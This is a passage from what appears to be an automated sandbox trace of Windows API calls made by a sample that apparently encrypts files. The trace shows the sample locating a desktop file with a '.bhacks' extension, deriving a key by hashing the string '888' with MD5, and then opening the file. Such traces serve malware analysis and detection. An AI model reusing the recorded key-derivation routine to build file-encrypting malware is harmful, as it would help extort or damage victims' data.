dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0101.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0101.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.478] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/j51yJlAI1.gif.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 0x9a3b80 [0101.478] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0101.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0101.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0101.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0101.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.480] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.480] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0101.480] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.480] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.481] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.482] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.482] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.483] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0101.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0101.483] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.483] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0101.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f20, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0101.483] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf330) returned 1 [0101.484] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0101.484] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0101.484] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.484] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.484] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0101.484] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0101.484] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.484] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.484] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.484] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.485] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.485] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.485] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.485] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.485] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.485] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9d90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0101.485] CryptCreateHash (in: hProv=0x9bf330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0101.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0101.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0101.485] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0101.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0101.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0101.485] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.485] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9e38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0101.485] CryptHashData (hHash=0x9a3b80, pbData=0x2a71908, dwDataLen=0x3, dwFlags=0x1) returned 1 [0101.486] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.486] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.486] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.486] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9da8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0101.486] CryptDeriveKey (in: hProv=0x9bf330, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a42c0) returned 1 [0101.486] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.486] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7180, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0101.486] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0101.487] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/j51yJlAI1.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\j51yjlai1.gif.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0101.487] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.487] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0101.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0101.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | 